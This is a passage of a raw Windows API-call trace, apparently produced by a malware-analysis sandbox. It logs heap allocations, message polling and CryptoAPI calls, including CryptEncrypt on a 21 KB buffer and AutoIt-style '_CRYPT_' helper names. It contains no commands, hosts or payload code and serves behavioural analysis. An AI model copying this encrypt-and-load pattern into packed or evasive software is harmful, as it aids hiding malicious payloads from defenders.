hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.603] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.606] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.606] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.606] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.606] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.606] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.606] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.606] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.607] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.607] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.607] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.607] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.607] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x53dc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x53e0) returned 1 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.608] CharLowerBuffW (in: lpsz="byte[21473]", cchLength=0xb | out: lpsz="byte[21473]") returned 0xb [0037.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.608] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.608] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xacfbd0*, pdwDataLen=0x6ae220*=0x53dc, dwBufLen=0x53e0 | out: pbData=0xacfbd0*, pdwDataLen=0x6ae220*=0x53e0) returned 1 [0037.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.608] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.609] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.609] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.609] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.609] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.609] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.609] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.611] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.611] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.611] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.611] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0037.611] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.611] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.611] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.612] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.612] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.612] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 